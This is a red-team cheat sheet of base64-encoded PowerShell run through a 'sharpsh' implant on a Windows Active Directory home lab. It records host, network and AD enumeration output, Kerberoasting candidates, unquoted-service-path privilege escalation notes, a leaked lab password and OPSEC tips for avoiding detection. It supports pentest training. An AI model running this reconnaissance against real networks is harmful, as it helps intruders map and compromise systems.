BASE64 ENCODING
Example 1:
cat <<'CMD' | base64 -w 0
<$COMMAND>
CMD
If the target rejects the UTF-8 form (PowerShell's own `-EncodedCommand` expects a UTF-16LE string), encode the command as UTF-16LE instead:
Example 2:
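# UTF-16LE variant of the encoder. The heredoc keeps the command literal (no
# shell expansion of $ or backticks) and appends a newline, which PowerShell
# ignores. The stray '"' after the placeholder in the original would have been
# encoded into the command and broken it.
cat <<'CMD' | iconv -t UTF-16LE | base64 -w 0
<$COMMAND>
CMD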
INITIAL ENUMERATION
Check OS version
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0LU9iamVjdCBDYXB0aW9uLCBWZXJzaW9uLCBCdWlsZE51bWJlciwgT1NBcmNoaXRlY3R1cmUK'
Caption Version BuildNumber OSArchitecture
------- ------- ----------- --------------
Microsoft Windows Server 2019 Datacenter Evaluation 10.0.17763 17763 64-bit
Check for domain
cat <<'CMD' | base64 -w 0
(Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain
CMD
sharpsh -t 20 -- '-e -c KEdldC1XbWlPYmplY3QgLUNsYXNzIFdpbjMyX0NvbXB1dGVyU3lzdGVtKS5QYXJ0T2ZEb21haW4K'
True
If True, get the domain name
cat <<'CMD' | base64 -w 0
(Get-WmiObject -Class Win32_ComputerSystem).Domain
CMD
sharpsh -t 20 -- '-e -c KEdldC1XbWlPYmplY3QgLUNsYXNzIFdpbjMyX0NvbXB1dGVyU3lzdGVtKS5Eb21haW4K'
north.sevenkingdoms.local
whoami
cat <<'CMD' | base64 -w 0
whoami /all
CMD
sharpsh -t 20 -- '-e -c d2hvYW1pIC9hbGwK'
User Name SID
================ ===
north\robb.stark S-1-5-21-3025714217-3891194231-...
Privilege Name Description State
=============================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
List all local users
cat <<'CMD' | base64 -w 0
Get-LocalUser | Select-Object Name, Enabled, LastLogon, PasswordLastSet
CMD
sharpsh -t 20 -- '-e -c R2V0LUxvY2FsVXNlciB8IFNlbGVjdC1PYmplY3QgTmFtZSwgRW5hYmxlZCwgTGFzdExvZ29uLCBQYXNzd29yZExhc3RTZXQK'
Name Enabled
---- -------
Administrator True
DefaultAccount False
Guest True
List local administrators group
cat <<'CMD' | base64 -w 0
Get-LocalGroupMember -Group 'Administrators'
CMD
sharpsh -t 20 -- '-e -c R2V0LUxvY2FsR3JvdXBNZW1iZXIgLUdyb3VwICdBZG1pbmlzdHJhdG9ycycK'
ObjectClass Name PrincipalSource
----------- ---- ---------------
User CASTELBLACK\Administrator Local
User CASTELBLACK\vagrant Local
Group NORTH\Domain Admins ActiveDirectory
User NORTH\jeor.mormont ActiveDirectory
List all running processes
cat <<'CMD' | base64 -w 0
Get-Process | Select-Object ProcessName, Id, Path | Sort-Object ProcessName
CMD
sharpsh -t 20 -- '-e -c R2V0LVByb2Nlc3MgfCBTZWxlY3QtT2JqZWN0IFByb2Nlc3NOYW1lLCBJZCwgUGF0aCB8IFNvcnQtT2JqZWN0IFByb2Nlc3NOYW1lCg=='
ProcessName Id Path
----------- -- ----
conhost 3648
conhost 2728 C:\Windows\system32\conhost.exe
csrss 492
...
List services running as SYSTEM
echo -n 'Get-WmiObject win32_service | Where-Object {$_.StartName -eq "LocalSystem"} | Select-Object Name, PathName, State, StartMode' | base64 -w 0
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCB3aW4zMl9zZXJ2aWNlIHwgV2hlcmUtT2JqZWN0IHskXy5TdGFydE5hbWUgLWVxICJMb2NhbFN5c3RlbSJ9IHwgU2VsZWN0LU9iamVjdCBOYW1lLCBQYXRoTmFtZSwgU3RhdGUsIFN0YXJ0TW9kZQ=='
Name PathName
---- --------
AppHostSvc C:\Windows\system32\svchost.exe -k apphost
Appinfo C:\Windows\system32\svchost.exe -k netsvcs -p
AppMgmt C:\Windows\system32\svchost.exe -k netsvcs -p
...
List unquoted service paths
cat <<'CMD' | base64 -w 0
Get-WmiObject win32_service | Where-Object { $_.PathName -notlike '"*' -and $_.PathName -like '* *' } | Select-Object Name, PathName, StartName, State
CMD
sharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCB3aW4zMl9zZXJ2aWNlIHwgV2hlcmUtT2JqZWN0IHsgJF8uUGF0aE5hbWUgLW5vdGxpa2UgJyIqJyAtYW5kICRfLlBhdGhOYW1lIC1saWtlICcqIConIH0gfCBTZWxlY3QtT2JqZWN0IE5hbWUsIFBhdGhOYW1lLCBTdGFydE5hbWUsIFN0YXRlCg=='
Name : VulnerableService PathName : C:\Program Files\Company App\Service.exe StartName: LocalSystem State : Running
Because the path is unquoted, the service control manager tries `C:\Program.exe` and then `C:\Program Files\Company.exe` before reaching `C:\Program Files\Company App\Service.exe`; a binary dropped at one of those locations runs as LocalSystem on the next service start. This only works if your current user can write to one of those directories (check with `icacls "C:\Program Files"` first) and you can restart the service or the host. The VulnerableService entry above appears to be an illustrative example rather than output from this lab.
NETWORK RECONNAISSANCE
List basic network configuration
cat <<'CMD' | base64 -w 0
Get-NetIPConfiguration
CMD
sharpsh -t 20 -- '-e -c R2V0LU5ldElQQ29uZmlndXJhdGlvbgo='
InterfaceAlias : Ethernet1
IPv4Address : 192.168.56.22
IPv6DefaultGateway :
IPv4DefaultGateway :
DNSServer : 192.168.56.11
List established network connections
cat <<'CMD' | base64 -w 0
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess | Sort-Object RemoteAddress
CMD
sharpsh -t 20 -- '-e -c R2V0LU5ldFRDUENvbm5lY3Rpb24gfCBXaGVyZS1PYmplY3QgeyRfLlN0YXRlIC1lcSAiRXN0YWJsaXNoZWQifSB8IFNlbGVjdC1PYmplY3QgTG9jYWxBZGRyZXNzLCBMb2NhbFBvcnQsIFJlbW90ZUFkZHJlc3MsIFJlbW90ZVBvcnQsIE93bmluZ1Byb2Nlc3MgfCBTb3J0LU9iamVjdCBSZW1vdGVBZGRyZXNzCg=='
LocalAddress : 192.168.56.22 LocalPort : 52376 RemoteAddress : 192.168.56.134 RemotePort : 8088 OwningProcess : 6980
List arp cache – 1
cat <<'CMD' | base64 -w 0
Get-NetNeighbor | Where-Object {$_.State -ne "Unreachable" -and $_.State -ne "Incomplete"} | Select-Object IPAddress, LinkLayerAddress, State
CMD
sharpsh -t 20 -- '-e -c R2V0LU5ldE5laWdoYm9yIHwgV2hlcmUtT2JqZWN0IHskXy5TdGF0ZSAtbmUgIlVucmVhY2hhYmxlIiAtYW5kICRfLlN0YXRlIC1uZSAiSW5jb21wbGV0ZSJ9IHwgU2VsZWN0LU9iamVjdCBJUEFkZHJlc3MsIExpbmtMYXllckFkZHJlc3MsIFN0YXRlCg=='
192.168.56.134 00-0C-29-19-4E-3D Reachable 192.168.56.11 00-0C-29-92-D6-8B Reachable 192.168.56.1 00-50-56-C0-00-02 Reachable
List arp cache – 2
cat <<'CMD' | base64 -w 0
arp -a | sls '^\s*(\d{1,3}(\.\d{1,3}){3})\s+([0-9a-f-]{17})' | % { $ip=$_.Matches[0].Groups[1].Value;$mac=$_.Matches[0].Groups[3].Value;$hn=try{[System.Net.Dns]::GetHostEntry($ip).HostName}catch{$null};[pscustomobject]@{IPAddress=$ip;MACAddress=$mac;Hostname=$hn} } | sort IPAddress
CMD
sharpsh -i -t 20 -- '-e -c YXJwIC1hIHwgc2xzICdeXHMqKFxkezEsM30oXC5cZHsxLDN9KXszfSlccysoWzAtOWEtZi1dezE3fSknIHwgJSB7ICRpcD0kXy5NYXRjaGVzWzBdLkdyb3Vwc1sxXS5WYWx1ZTskbWFjPSRfLk1hdGNoZXNbMF0uR3JvdXBzWzNdLlZhbHVlOyRobj10cnl7W1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEVudHJ5KCRpcCkuSG9zdE5hbWV9Y2F0Y2h7JG51bGx9O1twc2N1c3RvbW9iamVjdF1Ae0lQQWRkcmVzcz0kaXA7TUFDQWRkcmVzcz0kbWFjO0hvc3RuYW1lPSRobn0gfSB8IHNvcnQgSVBBZGRyZXNzCg=='
IPAddress MACAddress Hostname
--------- ---------- --------
192.168.56.10 00-0c-29-eb-f3-6b kingslanding...
192.168.56.11 00-0c-29-92-d6-8b winterfell....
...
Ping sweep subnet
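# Ping sweep of the /24.
# Fixes: the original one-liner lacked the ';' between the assignment and the
# 'if', so PowerShell refuses to parse it; -TimeoutSeconds is a PowerShell 6+
# parameter that Windows PowerShell 5.1 (the default on Server 2019) does not
# accept, so it is dropped. The encoded payload published for this entry was a
# copy of the Get-NetNeighbor command, which is why the "sweep" output below is
# an ARP table. The value printed here is the one to pass to sharpsh.
# OPSEC: 254 ICMP probes from the foothold are noisy and miss hosts that block
# ICMP; prefer the ARP-cache listings above when stealth matters. A sparse
# subnet can also exceed the 60 s timeout - raise -t or narrow the range.
b64=$(base64 -w 0 <<'CMD'
1..254 | ForEach-Object { $ip = "192.168.56.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { Write-Output "$ip is alive" } }
CMD
)
printf '%s\n' "$b64"
# Paste the printed value instead if sharpsh is not run from this shell.
sharpsh -t 60 -- "-e -c $b64"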
192.168.56.100 00-0C-29-67-33-F1 Reachable
192.168.56.11 00-0C-29-9D-F2-E4 Stale
192.168.56.10 00-0C-29-3A-3A-7B Stale
192.168.56.1 00-50-56-C0-00-01 Reachable
List installed software (64-bit)
cat <<'CMD' | base64 -w 0
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null}
CMD
sharpsh -i -t 20 -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdC1PYmplY3QgRGlzcGxheU5hbWUsIERpc3BsYXlWZXJzaW9uLCBQdWJsaXNoZXIsIEluc3RhbGxEYXRlIHwgV2hlcmUtT2JqZWN0IHskXy5EaXNwbGF5TmFtZSAtbmUgJG51bGx9Cg=='
DisplayName DisplayVersion Publisher
----------- -------------- ---------
7-Zip 25.01 (x64) 25.01 Igor Pavlov
Microsoft SQL Server 2019 (64-bit)
Microsoft SQL Server 2019 (64-bit) Microsoft
...
List 32-bit installed software on 64-bit systems
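# 32-bit software registered on a 64-bit host (Wow6432Node uninstall hive).
# The encoded payload published for this entry decoded to the 64-bit hive path
# (identical to the previous entry), which is why both listings were the same;
# the value printed here is the one to pass to sharpsh.
b64=$(base64 -w 0 <<'CMD'
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null}
CMD
)
printf '%s\n' "$b64"
# Paste the printed value instead if sharpsh is not run from this shell.
sharpsh -i -t 20 -- "-e -c $b64"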
DisplayName DisplayVersion Publisher
----------- -------------- ---------
7-Zip 25.01 (x64) 25.01 Igor Pavlov
Microsoft SQL Server 2019 (64-bit)
Microsoft SQL Server 2019 (64-bit) Microsoft
...
List security products
cat <<'CMD' | base64 -w 0
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | Select-Object displayName, pathToSignedProductExe, productState
CMD
sharpsh -i -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtTmFtZXNwYWNlIHJvb3RcU2VjdXJpdHlDZW50ZXIyIC1DbGFzcyBBbnRpVmlydXNQcm9kdWN0IHwgU2VsZWN0LU9iamVjdCBkaXNwbGF5TmFtZSwgcGF0aFRvU2lnbmVkUHJvZHVjdEV4ZSwgcHJvZHVjdFN0YXRlCg=='
displayName pathToSignedProductExe productState ----------- ---------------------- ------------ Windows Defender windowsdefender:// 397568
ACTIVE DIRECTORY
Installation
Some of the commands below need the Active Directory PowerShell module (part of RSAT). There are ways to load it without installing anything on the target, but since this is a local home lab it was simply installed through PowerShell as shown below:
Windows 10 / 11
PowerShell (Admin)
# Install RSAT AD module
Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
# Verify
Get-Module -ListAvailable ActiveDirectory
DISM (Admin) alternative
DISM /Online /Add-Capability /CapabilityName:Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
Windows Server
Server 2016 / 2019 / 2022 (PowerShell)
# Install RSAT AD module
Install-WindowsFeature RSAT-AD-PowerShell
# Verify
Get-Module -ListAvailable ActiveDirectory
Server 2012 R2 / 2012 (PowerShell)
# Install RSAT AD module
Add-WindowsFeature RSAT-AD-PowerShell
Import + quick test
Import-Module ActiveDirectory
Get-Command Get-ADUser
List current domain information
cat <<'CMD' | base64 -w 0
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
CMD
sharpsh -i -t 20 -- '-e -c W1N5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcy5BY3RpdmVEaXJlY3RvcnkuRG9tYWluXTo6R2V0Q3VycmVudERvbWFpbigpCg=='
Forest : sevenkingdoms.local
DomainControllers : {winterfell...}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent : sevenkingdoms.local
PdcRoleOwner : winterfell.north.sevenkingdoms.local
RidRoleOwner : winterfell.north.sevenkingdoms.local
...
List all domain controllers
cat <<'CMD' | base64 -w 0
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select-Object Name, IPAddress, OSVersion
CMD
sharpsh -t 20 -- '-e -c W1N5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcy5BY3RpdmVEaXJlY3RvcnkuRG9tYWluXTo6R2V0Q3VycmVudERvbWFpbigpLkRvbWFpbkNvbnRyb2xsZXJzIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBJUEFkZHJlc3MsIE9TVmVyc2lvbgo='
Name IPAddress OSVersion
---- --------- ---------
winterfell 192.168.56.11 Windows Server 2019
List all users in the domain (`-Properties *` fetches every attribute of every user; on a real domain restrict it to the attributes you actually select to cut LDAP volume and log noise)
cat <<'CMD' | base64 -w 0
Get-ADUser -Filter * -Properties * | Select-Object Name, SamAccountName, Enabled, LastLogonDate, PasswordLastSet, whenCreated, AdminCount
CMD
sharpsh -t 20 -- '-e -c R2V0LUFEVXNlciAtRmlsdGVyICogLVByb3BlcnRpZXMgKiB8IFNlbGVjdC1PYmplY3QgTmFtZSwgU2FtQWNjb3VudE5hbWUsIEVuYWJsZWQsIExhc3RMb2dvbkRhdGUsIFBhc3N3b3JkTGFzdFNldCwgd2hlbkNyZWF0ZWQsIEFkbWluQ291bnQK'
... Name : eddard.stark SamAccountName : eddard.stark Enabled : True LastLogonDate : 1/11/2026 7:41:26 AM PasswordLastSet : 11/22/2025 11:13:29 AM whenCreated : 11/22/2025 11:13:29 AM AdminCount : 1 Name : catelyn.stark SamAccountName : catelyn.stark Enabled : True LastLogonDate : PasswordLastSet : 11/22/2025 11:13:33 AM whenCreated : 11/22/2025 11:13:33 AM AdminCount : 1 Name : jeor.mormont SamAccountName : jeor.mormont Enabled : True LastLogonDate : 1/11/2026 7:37:04 AM PasswordLastSet : 11/22/2025 11:13:36 AM whenCreated : 11/22/2025 11:13:36 AM AdminCount : 1 ...
List AD users with Description fields - descriptions are a classic place for leaked credentials (see samwell.tarly below); verify any password found against the account before relying on it, and record it as a finding
cat <<'CMD' | base64 -w 0
Get-ADUser -Filter * -Properties Description | Select-Object SamAccountName, Enabled, Description
CMD
sharpsh -t 20 -- '-e -c R2V0LUFEVXNlciAtRmlsdGVyICogLVByb3BlcnRpZXMgRGVzY3JpcHRpb24gfCBTZWxlY3QtT2JqZWN0IFNhbUFjY291bnROYW1lLCBFbmFibGVkLCBEZXNjcmlwdGlvbgo='
SamAccountName Enabled Description
-------------- ------- -----------
hodor True Brainless Giant
jon.snow True Jon Snow
samwell.tarly True Samwell Tarly(Password:Heartsbane)
jeor.mormont True Jeor Mormont
sql_svc True sql service
List domain administrators
cat <<'CMD' | base64 -w 0
Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object Name, SamAccountName, objectClass
CMD
sharpsh -t 20 -- '-e -c R2V0LUFER3JvdXBNZW1iZXIgLUlkZW50aXR5ICJEb21haW4gQWRtaW5zIiAtUmVjdXJzaXZlIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBTYW1BY2NvdW50TmFtZSwgb2JqZWN0Q2xhc3MK'
Name SamAccountName objectClass ---- -------------- ----------- Administrator Administrator user eddard.stark eddard.stark user
List all computers in the domain
cat <<'CMD' | base64 -w 0
Get-ADComputer -Filter * -Properties * | Select-Object Name, OperatingSystem, OperatingSystemVersion, LastLogonDate, IPv4Address
CMD
sharpsh -t 20 -- '-e -c R2V0LUFEQ29tcHV0ZXIgLUZpbHRlciAqIC1Qcm9wZXJ0aWVzICogfCBTZWxlY3QtT2JqZWN0IE5hbWUsIE9wZXJhdGluZ1N5c3RlbSwgT3BlcmF0aW5nU3lzdGVtVmVyc2lvbiwgTGFzdExvZ29uRGF0ZSwgSVB2NEFkZHJlc3MK'
Name : WINTERFELL
OperatingSystem : Windows Server 2019
OperatingSystemVersion : 10.0 (17763)
LastLogonDate : 1/11/2026 7:37:01 AM
IPv4Address : 192.168.56.11
Name : CASTELBLACK
OperatingSystem : Windows Server 2019
OperatingSystemVersion : 10.0 (17763)
LastLogonDate : 1/11/2026 7:37:03 AM
IPv4Address : 192.168.56.22
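# List SMB shares exposed by every domain computer ("net view" per host),
# encoded as UTF-16LE. The published entry had an empty -e -c payload; the
# value printed here is the one to pass to sharpsh.
# Fix: "$LASTEXITCODE-ne0" is not tokenised as a comparison by PowerShell; the
# operator and operand need whitespace around them.
# OPSEC: this opens an SMB session to every computer object and may stall on
# hosts that are down or firewalled; scope the Get-ADComputer filter and raise
# -t on anything larger than a lab.
b64=$(iconv -t UTF-16LE <<'CMD' | base64 -w 0
Get-ADComputer -Filter * -Properties dnsHostName | Select -Expand dnsHostName | ForEach-Object { $h=$_; $o=net view \\$h 2>$null; if($LASTEXITCODE -ne 0 -or -not $o){return}; ($o -split "`n")|Select-String '^\s*(\S+)\s+(Disk|Print|IPC)\s+(.*)$'|ForEach-Object{$m=$_.Matches[0].Groups;[pscustomobject]@{Host=$h;Share=$m[1].Value;Type=$m[2].Value;Comment=$m[3].Value.Trim()}} } | Format-Table -AutoSize
CMD
)
printf '%s\n' "$b64"
# Paste the printed value instead if sharpsh is not run from this shell.
sharpsh -i -t 20 -- "-e -c $b64"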
List AD users using ADSI (DirectorySearcher returns at most the server's MaxPageSize - normally 1000 objects - unless `$searcher.PageSize=1000` is set before FindAll(); set it on anything larger than a lab)
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(objectClass=user)";$null=$searcher.PropertiesToLoad.AddRange(@("samaccountname","displayname","mail"));$searcher.FindAll()|ForEach-Object{[PSCustomObject]@{Username=$_.Properties['samaccountname'][0];DisplayName=$_.Properties['displayname'][0];Email=$_.Properties['mail'][0]}}
CMD
sharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihvYmplY3RDbGFzcz11c2VyKSI7JG51bGw9JHNlYXJjaGVyLlByb3BlcnRpZXNUb0xvYWQuQWRkUmFuZ2UoQCgic2FtYWNjb3VudG5hbWUiLCJkaXNwbGF5bmFtZSIsIm1haWwiKSk7JHNlYXJjaGVyLkZpbmRBbGwoKXxGb3JFYWNoLU9iamVjdHtbUFNDdXN0b21PYmplY3RdQHtVc2VybmFtZT0kXy5Qcm9wZXJ0aWVzWydzYW1hY2NvdW50bmFtZSddWzBdO0Rpc3BsYXlOYW1lPSRfLlByb3BlcnRpZXNbJ2Rpc3BsYXluYW1lJ11bMF07RW1haWw9JF8uUHJvcGVydGllc1snbWFpbCddWzBdfX0K'
Username DisplayName Email -------- ----------- ----- Administrator Guest vagrant Vagrant WINTERFELL$ krbtgt SEVENKINGDOMS$ CASTELBLACK$ arya.stark eddard.stark catelyn.stark jeor.mormont sansa.stark brandon.stark rickon.stark hodor jon.snow samwell.tarly jeor.mor
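# List Domain Admins, including nested members, using ADSI
# (LDAP_MATCHING_RULE_IN_CHAIN, OID 1.2.840.113556.1.4.1941).
# Fix: the original filter carried a template DN (DC=corp,DC=local) instead of
# this lab's DC=north,DC=sevenkingdoms,DC=local, which is presumably why no
# output was recorded. The domain DN is now read from RootDSE so the query works
# in any domain; the value printed here is the one to pass to sharpsh.
b64=$(base64 -w 0 <<'CMD'
$dn=([ADSI]"LDAP://RootDSE").defaultNamingContext; $searcher=[ADSISearcher]"(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,$dn)"; $searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname'][0] }
CMD
)
printf '%s\n' "$b64"
# Paste the printed value instead if sharpsh is not run from this shell.
sharpsh -t 20 -- "-e -c $b64"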
List all computers using ADSI
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(objectClass=computer)";$null=$searcher.PropertiesToLoad.AddRange(@("name","operatingsystem","operatingsystemversion"));$searcher.FindAll()|ForEach-Object{[PSCustomObject]@{Name=$_.Properties['name'][0];OS=$_.Properties['operatingsystem'][0];Version=$_.Properties['operatingsystemversion'][0]}}
CMD
sharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihvYmplY3RDbGFzcz1jb21wdXRlcikiOyRudWxsPSRzZWFyY2hlci5Qcm9wZXJ0aWVzVG9Mb2FkLkFkZFJhbmdlKEAoIm5hbWUiLCJvcGVyYXRpbmdzeXN0ZW0iLCJvcGVyYXRpbmdzeXN0ZW12ZXJzaW9uIikpOyRzZWFyY2hlci5GaW5kQWxsKCl8Rm9yRWFjaC1PYmplY3R7W1BTQ3VzdG9tT2JqZWN0XUB7TmFtZT0kXy5Qcm9wZXJ0aWVzWyduYW1lJ11bMF07T1M9JF8uUHJvcGVydGllc1snb3BlcmF0aW5nc3lzdGVtJ11bMF07VmVyc2lvbj0kXy5Qcm9wZXJ0aWVzWydvcGVyYXRpbmdzeXN0ZW12ZXJzaW9uJ11bMF19fQo='
Name OS Version
---- -- -----
WINTERFELL Windows Server 2019 10.0 (17763)
CASTELBLACK Windows Server 2019 10.0 (17763)
List users w/ never expire passwords using ADSI
cat <<'CMD' | base64 -w 0
$searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))";$searcher.FindAll() | ForEach-Object {$_.Properties['samaccountname']}
CMD
sharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyID0gW0FEU0lTZWFyY2hlcl0iKCYob2JqZWN0Q2xhc3M9dXNlcikodXNlckFjY291bnRDb250cm9sOjEuMi44NDAuMTEzNTU2LjEuNC44MDM6PTY1NTM2KSkiOyRzZWFyY2hlci5GaW5kQWxsKCkgfCBGb3JFYWNoLU9iamVjdCB7JF8uUHJvcGVydGllc1snc2FtYWNjb3VudG5hbWUnXX0K'
Administrator Guest vagrant arya.stark eddard.stark catelyn.stark jeor.mormont sansa.stark brandon.stark rickon.stark hodor jon.snow samwell.tarly jeor.mormont sql_svc
List users w/ password not required (PASSWD_NOTREQD, userAccountControl bit 32) using ADSI - such accounts are allowed to have an empty password
cat <<'CMD' | base64 -w 0
$searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"; $searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname']}
CMD
sharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyID0gW0FEU0lTZWFyY2hlcl0iKCYob2JqZWN0Q2xhc3M9dXNlcikodXNlckFjY291bnRDb250cm9sOjEuMi44NDAuMTEzNTU2LjEuNC44MDM6PTMyKSkiOyAkc2VhcmNoZXIuRmluZEFsbCgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXy5Qcm9wZXJ0aWVzWydzYW1hY2NvdW50bmFtZSddfQo='
Guest SEVENKINGDOMS$
Find accounts w/ SPNs using ADSI (user accounts with SPNs - jon.snow, sansa.stark and sql_svc below - are Kerberoasting candidates; the computer account and krbtgt are not)
cat <<'CMD' | base64 -w 0
$searcher=[ADSISearcher]"(servicePrincipalName=*)";$null=$searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname"));$searcher.FindAll()|%{[PSCustomObject]@{Username=$_.Properties['samaccountname'][0];SPN=$_.Properties['serviceprincipalname'][0]}}
CMD
sharpsh -i -t 20 -- '-e -c JHNlYXJjaGVyPVtBRFNJU2VhcmNoZXJdIihzZXJ2aWNlUHJpbmNpcGFsTmFtZT0qKSI7JG51bGw9JHNlYXJjaGVyLlByb3BlcnRpZXNUb0xvYWQuQWRkUmFuZ2UoQCgic2FtYWNjb3VudG5hbWUiLCJzZXJ2aWNlcHJpbmNpcGFsbmFtZSIpKTskc2VhcmNoZXIuRmluZEFsbCgpfCV7W1BTQ3VzdG9tT2JqZWN0XUB7VXNlcm5hbWU9JF8uUHJvcGVydGllc1snc2FtYWNjb3VudG5hbWUnXVswXTtTUE49JF8uUHJvcGVydGllc1snc2VydmljZXByaW5jaXBhbG5hbWUnXVswXX19Cg=='
Username SPN
-------- ---
jon.snow CIFS/thewall.north.sevenkingdoms.local
CASTELBLACK$ HTTP/winterfell.north.sevenkingdoms.local
sansa.stark HTTP/eyrie.north.sevenkingdoms.local
krbtgt kadmin/changepw
sql_svc MSSQLSvc/castelblack.north.sevenkingdoms.local
ACTIVE DIRECTORY – NATIVE TOOLS
List domain controllers
cat <<'CMD' | base64 -w 0
nltest /dclist:north.sevenkingdoms.local
CMD
sharpsh -t 20 -- '-e -c bmx0ZXN0IC9kY2xpc3Q6bm9ydGguc2V2ZW5raW5nZG9tcy5sb2NhbAo='
Get list of DCs in domain 'north.sevenkingdoms.local' from '\\winterfell.north.sevenkingdoms.local'.
winterfell.north.sevenkingdoms.local [PDC] [DS] Site: Default-First-Site-Name
List domain trusts
cat <<'CMD' | base64 -w 0
nltest /domain_trusts
CMD
sharpsh -t 20 -- '-e -c bmx0ZXN0IC9kb21haW5fdHJ1c3RzCg=='
List of domain trusts:
0: SEVENKINGDOMS sevenkingdoms.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
1: NORTH north.sevenkingdoms.local (NT 5) (Forest: 0) (Primary Domain) (Native)
List all trusts
cat <<'CMD' | base64 -w 0
nltest /domain_trusts /all_trusts
CMD
sharpsh -t 20 -- '-e -c bmx0ZXN0IC9kb21haW5fdHJ1c3RzIC9hbGxfdHJ1c3RzCg=='
List of domain trusts:
0: SEVENKINGDOMS sevenkingdoms.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
1: NORTH north.sevenkingdoms.local (NT 5) (Forest: 0) (Primary Domain) (Native)
List domain controller info
cat <<'CMD' | base64 -w 0
nltest /dsgetdc:north.sevenkingdoms.local
CMD
sharpsh -t 20 -- '-e -c bmx0ZXN0IC9kc2dldGRjOm5vcnRoLnNldmVua2luZ2RvbXMubG9jYWwK'
DC: \\winterfell.north.sevenkingdoms.local Address: \\192.168.56.11 Dom Guid: 9e1ed7bc-2169-4ff6-a96e-71037cac7d5c Dom Name: north.sevenkingdoms.local Forest Name: sevenkingdoms.local Dc Site Name: Default-First-Site-Name Our Site Name: Default-First-Site-Name Flags: PDC GC DS LDAP KDC TIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9 DS_10 0x20000
List current domain and site
cat <<'CMD' | base64 -w 0
nltest /dsgetsite
CMD
sharpsh -t 20 -- '-e -c bmx0ZXN0IC9kc2dldHNpdGUK'
Default-First-Site-Name
List domain information
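# PDC lookup via nltest /dcname (NetGetDCName). This legacy call appears to
# resolve the NetBIOS domain name only; the DNS form used originally failed with
# NERR_DCNotFound (output below). The same PDC is already shown by
# "nltest /dsgetdc:" above, so this is a cross-check, not new information.
cat <<'CMD' | base64 -w 0
nltest /dcname:NORTH
CMD
sharpsh -t 20 -- '-e -c bmx0ZXN0IC9kY25hbWU6Tk9SVEgK'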
Output of the original `nltest /dcname:north.sevenkingdoms.local` (DNS-name) form: NetGetDCName failed: Status = 2453 0x995 NERR_DCNotFound
ACTIVE DIRECTORY – DSQUERY
Installation
Requires elevated privileges, and installs components on the target (noisy, and leaves artifacts in the servicing logs). The capability name below is the Windows 10/11 RSAT package; on Windows Server (CASTELBLACK here is Server 2019) use `Install-WindowsFeature RSAT-ADDS-Tools` (AD DS Snap-Ins and Command-Line Tools, which include the ds* utilities) in the same way as the PowerShell-module install above:
cat <<'CMD' | base64 -w 0
Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
CMD
sharpsh -t 20 -- '-e -c QWRkLVdpbmRvd3NDYXBhYmlsaXR5IC1PbmxpbmUgLU5hbWUgUnNhdC5BY3RpdmVEaXJlY3RvcnkuRFMtTERTLlRvb2xzfn5+fjAuMC4xLjAK'
Or if you have GUI access and privileges:
- Open Server Manager
- Navigate to Manage > Add Roles and Features
- Proceed to Features
- Expand Remote Server Administration Tools
- Navigate to Role Administration Tools
- Select AD DS and AD LDS Tools
- Install
List all users in the domain
cat <<'CMD' | base64 -w 0
dsquery user -limit 0
CMD
